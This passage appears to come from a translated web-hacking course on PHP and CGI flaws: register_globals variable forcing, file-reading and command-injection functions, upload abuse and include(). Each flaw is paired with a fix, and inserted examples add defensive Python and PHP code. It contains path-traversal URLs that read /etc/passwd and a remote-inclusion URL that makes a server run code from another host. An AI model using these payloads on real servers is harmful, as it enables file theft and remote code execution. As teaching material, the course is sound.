                    print("Found (basic auth): $rep[$count] ");
                    break;
                } else {
                    break;
                }
            }
            fclose($fp);
        }
    }
    } else {
        print "Scanner Web by CrashFr";
The dictionary file is called "dictionary.txt" and must be placed in the same directory as "scan_web.php". It contains one directory or file name per line. To launch the script, all that has to be done is to specify the address and the HTTP server port to scan. In the example below, we carry out a local scan on port 80 with the default timeout of 10 seconds. Here is the result found:
Many webmasters leave temporary files unattended, thus allowing the hacker to obtain a certain amount of information on the remote server or to have access to the administrator panel. The file that is very often found on sites coded in PHP is a file using the phpinfo() function, which is used by the webmaster to check the proper functioning of PHP.
The phpinfo() function gives the hacker very important information, such as the version and type of the OS, the HTTP server, PHP and many others we will not go into in this chapter. It is therefore strongly recommended to delete all temporary files, test files, etc., so as not to make the hacker's task any easier, and above all to remember that a directory or a file that is not linked from any page of the site is not for that reason a hidden or inaccessible one...
2. PHP Vulnerabilities
In some cases, the hacker can use vulnerable PHP scripts to execute commands, display file sources, list the contents of directories or upload files to a server, in order to finally take total control of it or steal the contents of a database. There are two kinds of vulnerabilities at the PHP level: those coming from the PHP source code itself and those due to improper website development by the webmaster. For a start, here are two examples of vulnerabilities in the PHP source code, which we will not attempt to detail so as not to lose time on points where a good knowledge of applicative vulnerabilities is needed:
http://www.securityfocus.com/archive/1/368864
http://www.securityfocus.com/archive/1/368861
So in this second part, I will explain the various vulnerabilities a hacker could use when the website developer has not written his code securely. As PHP is a dynamic language, it is very common to come across websites with forms that enable us, for example, to subscribe to a mailing list or send personal information about ourselves. We will therefore create a very simple HTML form with two fields ("login" and "pass") such as could be used on any site to identify a user. This HTML form sends two variables to the ident.php script with the POST method as soon as the user clicks on the validate button.
The "ident.php" file contains the PHP code that checks whether you have typed in the proper login and password. Here is what the identification source code could look like (if register_globals=on in php.ini):
       back to an error message */
    if ($ok == 1)
        print "You are identified";
    else
        print "You are not identified";
    ?>
In this first script it would be easy for the hacker to bypass the protection without knowing the correct password, if he can guess the name of the "$ok" variable or if the script is open source and he has access to its code. PHP actually lets the user (visitor) create and define variables directly from his browser, using the GET method (via the URL), POST (via a form) or COOKIE (by forging a cookie). When you click on the "validate" button of the form, your browser sends the "login" and "pass" variables in the HTTP request destined to the server, using the POST method. However, this does not prevent the script from also interpreting variables sent with the GET method, directly after the question mark that follows the URL. Let us take an example: I use crashfr as a login and test as a password and I click on the "submit" button of my form. It is exactly the same thing (if register_globals=on) as if I typed directly into my browser: http://www.myserver/ident.php?login=crashfr&pass=test.
If the hacker forces the $ok variable from the URL by setting it to 1, he is identified without knowing the password.
We can see that this type of vulnerability, like most PHP vulnerabilities, comes from bad coding, because the webmaster should have initialized the "$ok" variable to 0. But we also see that the variables used in a PHP script can be forced directly from the URL if "register_globals" is activated. But what exactly does "register_globals" correspond to? Actually, the "register_globals" option makes the developer's task easier. PHP stores the GET, POST, Cookie and Environment variables, and the variables defined in the script, in independent arrays. For example, if we want to recover the "$var1" variable sent in POST, we would have to use "$HTTP_POST_VARS['var1']" when "register_globals" is off. In the opposite case (register_globals=On), we can directly use the variable "$var1". But what happens if we receive "$var1" in both POST and GET at the same time, with different values? In fact, there is an option in php.ini which indicates the order in which the variables are interpreted. This option is called "variables_order" and its default value is "EGPCS",
which means that the default order is Environment, GET, POST, Cookie, Server (built-in) variables, each later source overriding the earlier ones. So if someone sends at the same time "$var1=get" using the GET method and "$var1=post" using the POST method, a script displaying "$var1" will show "post".
Fopen() Function
The fopen() function opens a file located on the server. When the variable that defines which file to open can be forced by the user and is not filtered correctly by the script, this function becomes a very powerful information-gathering tool for the hacker.
This script (fop.php) opens a file for reading and displays its contents. By forcing the $file variable from the URL, we can thus open files that are normally not accessible through the HTTP interface:

    http://myserver/fop.php?file=../../../../../etc/passwd                 // displays the passwd file
    http://myserver/fop.php?file=../../../../../etc/apache/httpd.conf      // displays Apache's configuration file

Another function that reads the contents of a file can be exploited by a hacker in the same way as fopen(): the file() function, which loads the whole contents of a file into an array. To avoid this kind of vulnerability, it is enough to force the file to be opened inside a specific directory and to check that the user is not trying to climb back up towards the root, as below:
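A Python version of that confinement check, added here as an example (it is not the booklet's PHP fix): it resolves the requested name under a base directory, follows symlinks before comparing, and rejects the ../ sequences used in the URLs above as well as a symlink that points outside. The demo tree it builds is constructed.

```python
import os
import tempfile


class UnsafePath(ValueError):
    """Raised when a requested file resolves outside the allowed directory."""


def confined_path(base_dir, requested):
    """Resolve `requested` (a user-supplied value such as the `file` parameter
    of fop.php) inside base_dir; raise UnsafePath if its real location
    escapes base_dir. realpath() follows symlinks and collapses '..' before
    the comparison, so 'sub/../x', '../../etc/passwd' and a link pointing
    outside are all judged on where they really land."""
    base = os.path.realpath(base_dir)
    # os.path.join would discard base for an absolute name: strip leading
    # separators so '/etc/passwd' is looked up as base/etc/passwd.
    target = os.path.realpath(os.path.join(base, requested.lstrip("/\\")))
    # Compare path components, not string prefixes: '/var/www/files_old'
    # starts with '/var/www/files' but is not inside it.
    if os.path.commonpath([base, target]) != base:
        raise UnsafePath(f"{requested!r} resolves outside {base_dir}")
    return target


def is_safe(base_dir, requested):
    """True when `requested` stays inside base_dir (see confined_path)."""
    try:
        confined_path(base_dir, requested)
        return True
    except UnsafePath:
        return False


def read_confined(base_dir, requested, limit=65536):
    """The fop.php behaviour with the check applied: read at most `limit`
    bytes of a file that is guaranteed to be inside base_dir."""
    with open(confined_path(base_dir, requested), "rb") as fh:
        return fh.read(limit)


def build_demo_tree():
    """Constructed layout: <tmp>/base/notes.txt is the public file,
    <tmp>/secret.txt sits outside the web directory, and base/leak is a
    symlink to it (the case a plain string check would miss)."""
    root = os.path.realpath(tempfile.mkdtemp())
    base = os.path.join(root, "base")
    os.mkdir(base)
    with open(os.path.join(base, "notes.txt"), "wb") as fh:
        fh.write(b"public")
    with open(os.path.join(root, "secret.txt"), "wb") as fh:
        fh.write(b"secret")
    os.symlink("../secret.txt", os.path.join(base, "leak"))
    return base


if __name__ == "__main__":
    base = build_demo_tree()
    for name in ("notes.txt", "sub/../notes.txt", "../../../../../etc/passwd",
                 "../../../../../etc/apache/httpd.conf", "../secret.txt", "leak"):
        print(f"{name:40s} -> {'allowed' if is_safe(base, name) else 'REJECTED'}")
    print(read_confined(base, "notes.txt"))
```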
System() Function
The system() function is one of the functions that can call system commands; the available commands depend on the OS. For example, if the webmaster wants to let a visitor run a ping from a web page, here is the script he could use on Unix:
Here is the result of a ping on a localhost, for example:
The problem with this type of script is that the user can use shell escape characters to have other commands executed (see the Applicative chapter). Here is an example which would allow an “ls” command to display the contents of the directory /etc:
Here are the other functions that can execute system commands: exec(), shell_exec(), popen(), proc_open(), passthru()
Security

To avoid this type of vulnerability, there are several functions to escape the characters that can act as shell escapes, such as “escapeshellcmd()”. It is also possible to use regular expressions to filter what is sent by the user. Here is the line to modify to prevent the hacker from executing commands other than ping:

system(escapeshellcmd('ping -c 5 '.$host));
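The regular-expression filter mentioned above, combined with escapeshellarg(), as an added example (not the course's own ping script); the form field name 'host' is an assumption.

```php
<?php
// Added example: validate $host before it is ever placed on a command line.
// The POST field name 'host' is an assumption.
$host = isset($_POST['host']) ? $_POST['host'] : '';

// Accept only a host name or dotted IPv4 address: letters, digits, '.' and '-'.
// The first character must be a letter or digit, so the value can never be
// read by ping as an option (e.g. a value starting with '-').
// ';', '|', '&', '`', '$', spaces and newlines never reach the shell.
if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9.-]{0,252}\z/', $host)) {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid host');
}

// escapeshellarg() wraps the value in single quotes so the shell sees exactly
// one literal argument, whereas escapeshellcmd() escapes metacharacters in
// the whole command string; the regular expression above is the main control,
// the quoting is a second line of defence.
$cmd = 'ping -c 5 ' . escapeshellarg($host);

header('Content-Type: text/plain');
system($cmd);
?>
```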
Uploading via PHP

Quite often, one comes across scripts that upload files to a server via a PHP script. Here is an example of a form that could be found on the Net:
This script, which I will call form2.php, sends a local file directly to the server hosting it. The hacker can use this type of form to recover some sensitive files, such as the passwd file, or simply to view the source of a PHP file, which in general contains passwords such as those of the database. It should be known that when a file is sent to a PHP script, and the file size is both smaller than the limit set in the PHP configuration file (php.ini) and not equal to zero, the file is temporarily stored in a directory on the server. To check the type, size and name of the file, the server defines four variables. In our script the file field is called “file”, so the four variables (if register_globals=on) are:

- $file --> name of the file temporarily stored on the server
- $file_name --> real name of the local file
- $file_type --> type of the file
- $file_size --> size of the file

By defining these four variables ourselves instead of having the server do it, we will be able to have it copy a file that should not be accessible to us. In our example, I am going to copy a .php file from the server into a .txt file. This way, I will be able to view the file's source, which was originally interpreted by the server: changing its extension prevents it from being interpreted.
Here is the result, which in this example reveals the login and password used to connect to the MySQL database:
Security

To avoid this kind of attack, we can use the PHP function which checks that the file really was uploaded using the POST method, as this prevents files already present on your server from being copied. Here is the code using the function “move_uploaded_file()”, enabling us to make our script secure:
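An added example of the secured upload handler (not the course's own form2.php): it reads the upload through $_FILES instead of the four register_globals variables, and refuses anything that PHP did not itself store for this request. The field name 'file' is the one from the course's form; the uploads/ directory and the extension list are assumptions.

```php
<?php
// Added example: accept only a genuine upload and store it under a new name.
// The destination directory is an assumption and must not be served as PHP.
$dest_dir = dirname(__FILE__) . '/uploads';

if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    exit('no file received');
}
$tmp  = $_FILES['file']['tmp_name'];
$name = basename($_FILES['file']['name']);   // drop any directory part sent by the client

// is_uploaded_file() is true only for the temporary file PHP created for this
// POST request, so a path supplied by the user (a .php file of the site, or
// /etc/passwd) is refused even if the variables were forced from the URL.
if (!is_uploaded_file($tmp)) {
    exit('not an uploaded file');
}

// Allow a short list of harmless extensions and rename the file, so that a
// .php file can never land in a directory the server interprets.
$ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
if (!in_array($ext, array('txt', 'png', 'jpg'), true)) {
    exit('file type not allowed');
}
$target = $dest_dir . '/' . uniqid('up_', true) . '.' . $ext;

// move_uploaded_file() performs the same "genuine upload" check itself and
// then moves the temporary file out of /tmp before the request ends.
if (!move_uploaded_file($tmp, $target)) {
    exit('upload failed');
}
echo 'stored as ' . htmlspecialchars(basename($target));
?>
```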
Include() Function

There are several functions that have to be used carefully when coding in PHP. Let us start with the include() function, which is very often used by the hacker to have malicious code executed by the HTTP server. The include() function includes another file's PHP code into a main PHP script.
inc.php file:

    <?php
    include($page);
    ?>

page1.php file:

    <?php
    print "yopyop";
    ?>
By typing http://myserver/inc.php?page=page1.php, our browser displays yopyop. This is perfectly normal. The hacker, however, is going to define the variable $page in such a way that the server executes his malicious PHP code. Let us imagine that the hacker has uploaded the malicious code to another server: all he has to do now is to type http://myserver/inc.php?page=http://serveur2/codemal.php so that “myserver” executes the malicious code present on server2. To avoid this kind of vulnerability, there are several PHP functions. The first one is “file_exists()”: this function checks whether the file exists on the local server. In the example above, the hacker could not include an external file if the inc.php file were modified as below:
However, the hacker could bypass this protection by temporarily uploading a file to the server. Uploading to a PHP script is a rather special procedure. If a file is sent through a form to a PHP script, a temporary copy of our file is saved on the server before the script is interpreted. Even if the file is refused by the script, it is still uploaded to a temporary directory on the server (generally /tmp)! To illustrate this, we are going to create an upload HTML form (form.html) locally, as below:
The script below associates our uploaded file with the variable “$page”. This is what our form looks like locally:
Now a malicious script (malicious.php) has to be created, which we are going to upload thanks to the form; in this example it simply prints a message and calls phpinfo():
All that has to be done now is to click on browse (form.html), choose the file to send (malicious.php) and watch the result:
The target server has executed our malicious code. This proves that the server has created a temporary file, assigned to the variable $page, because the PHP function file_exists() has detected the file on the server. Otherwise the inc.php script would not have included our malicious script...

Security

To avoid this kind of vulnerability, you should add a small verification in the file which uses the include function, as below:
We have also added a small verification to prevent the script from including itself over and over again if the hacker defines “$page=inc”.
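An added example (not the course's own inc.php) of the stricter form of that verification: instead of testing file_exists() on a user-supplied name, the script only includes pages from its own fixed table, which rules out a remote URL, a temporary upload in /tmp and inc.php itself in one step. The page names are assumptions.

```php
<?php
// Added example: include only pages listed in a table we control.
// The page names are assumptions.
$pages = array(
    'page1' => 'page1.php',
    'page2' => 'page2.php',
);
$page = isset($_GET['page']) ? $_GET['page'] : 'page1';

// The user's value is used only as a key: anything not in the table
// ("http://serveur2/codemal.php", "/tmp/phpXXXX", "inc") is rejected,
// so the script can neither fetch remote code nor include itself.
if (!isset($pages[$page])) {
    header('HTTP/1.1 404 Not Found');
    exit('unknown page');
}

// The path handed to include() is built from our own table, never from
// user input, and always points next to this script.
include dirname(__FILE__) . '/' . $pages[$page];
?>
```

Disabling allow_url_fopen (and, on PHP 5.2 and later, allow_url_include) in php.ini adds a server-wide barrier against the remote-include case, but does not replace the check above.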
There are other functions of the same type that can carry out includes, such as include_once(), require() and require_once().
3. CGI Vulnerabilities

CGI means Common Gateway Interface. These interfaces are application programs hosted on the web server whose function is to receive and process data sent by the client's browser, and to send back the results in HTML format. In this way, and like PHP, CGIs are used to build dynamic web pages on a web server. There are similarities with this language, but also major differences. First of all, they can be written in any language: C, Perl, shell script... The important thing is to understand that the information sent back by the browser is processed according to a standard and with the help of environment variables defined by the web server. We are going to explain this in detail. First, the information is sent to the server through pre-defined variables in the form, and understood by the CGI program. In this, the principle is exactly the same as for PHP, meaning that we use a form tag
REMOTE_HOST: client's host name
CONTENT_TYPE: type of information transferred
CONTENT_LENGTH: number of bytes of data sent to the CGI by the client
QUERY_STRING: holds the data sent by the client if the transfer method is METHOD=GET. If METHOD=POST is used, the data is read from the standard input instead.

The difference with PHP lies above all in the way the CGI processes the received data. PHP can recognize and directly use the names of the variables defined in the form, something that the CGI program cannot do. The latter has to retrieve everything that follows the ? as a character string and process it to obtain the values of the variables sent to it through the form. The CGI has to process arguments in this way because a form always sends back data in the shape of variable1=value1&variable2=value2... It can therefore be concluded that it would be entirely possible to pass the arguments to the program in a different form, by specifying them in the URL after the ?, and naturally only if the program were coded in such a way that it could process this information. Here is an example of code that recovers the information sent back by the client through a form:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    char *buffer;          /* pointer to the environment variable being read */
    char *data = NULL;     /* raw form data: variable1=value1&variable2=value2... */
    int length = 0;        /* number of bytes of form data */

    buffer = getenv("REQUEST_METHOD");         /* we recover the method used in the environment variable REQUEST_METHOD */
    if (buffer) {                              /* if this operation is successful we continue */
        if (strcmp(buffer, "POST") == 0) {     /* if the POST method is used */
            buffer = getenv("CONTENT_LENGTH"); /* we recover the size of the data sent back by the form */
            if (buffer) {                      /* if this operation is successful we continue */
                length = atoi(buffer);         /* we put this value in numeric form */
                data = malloc(length + 1);     /* we allocate memory for the data variable which will receive the data */
                if (data) {
                    fread(data, 1, length, stdin); /* we copy what arrives on the standard input into data */
                    data[length] = '\0';       /* we add the '\0' character at the end of the string contained in data */
                }
            }
        } else {                               /* otherwise (GET) the data is in QUERY_STRING */
            buffer = getenv("QUERY_STRING");
            if (buffer) {
                length = strlen(buffer);
                data = malloc(length + 1);
                if (data) {
                    strcpy(data, buffer);      /* we copy the data contained in QUERY_STRING into data */
                    data[length] = '\0';
                }
            }
        }
    }
Once the data has been sent back to the CGI program, it must be processed in order to extract the variables' values: we know that these are separated by the & sign, and the following code could be in charge of recovering the name and value of the first variable in temporary buffers.
    char variable_name[64];   /* name of the first variable (buffer sizes chosen here; the course gave none) */
    char variable[256];       /* value of the first variable */
    int i = 0, j = 0;

    /* we fill in variable_name with the name of the variable as long as a '=' sign
       has not been encountered, stopping at the end of the data and before the buffer is full */
    while (data[i] != '\0' && data[i] != '=' && j < (int)sizeof(variable_name) - 1) {
        variable_name[j++] = data[i++];
    }
    variable_name[j] = '\0';
    if (data[i] == '=') {
        i++;                  /* skip the '=' */
    }
    j = 0;
    /* the value runs until the next '&' or the end of the data */
    while (data[i] != '\0' && data[i] != '&' && j < (int)sizeof(variable) - 1) {
        variable[j++] = data[i++];
    }
    variable[j] = '\0';
We are also going to specify the exact syntax that a URL can have, for the proper understanding of the rest of the chapter. A URL cannot contain any space characters, nor any line feed, nor any accented characters. Their URL-encoded ASCII equivalents have to be used. The two most important ones to know are:

%0a for line feed
%20 for space

Now that we have studied how CGIs function, we are going to present the security problems linked to them. A CGI is a program that is executed on the server; it is therefore possible to pass it variables that make it execute commands not wanted by the administrator, or that allow the consultation of files to which the user should not normally have access, such as the /etc/passwd file under a UNIX-type system, as it contains the list of users. We are going to see several common vulnerabilities which can exist in a CGI program:
A common mistake is to use hidden-type variables in the form; they are presented as follows:

The main danger with this type of configuration is that it allows a hacker to know the names of the variables used by the CGI, which have pre-defined values. He could then try to modify them to his liking. Furthermore, if this variable is used to indicate a configuration, log or result file (where the user data will be stored), it will be possible to obtain the exact path and so to consult them. It is also a regular occurrence that a hidden field contains an email address to which all the information given by the client will be sent. In this case, the server uses the system() function to mail these results to the indicated address. This case is studied in the following paragraph. It is also possible for this variable to be used by the CGI as the address of a page confirming reception of the data. If the script has been badly configured, we can give another path to view a file such as /etc/passwd.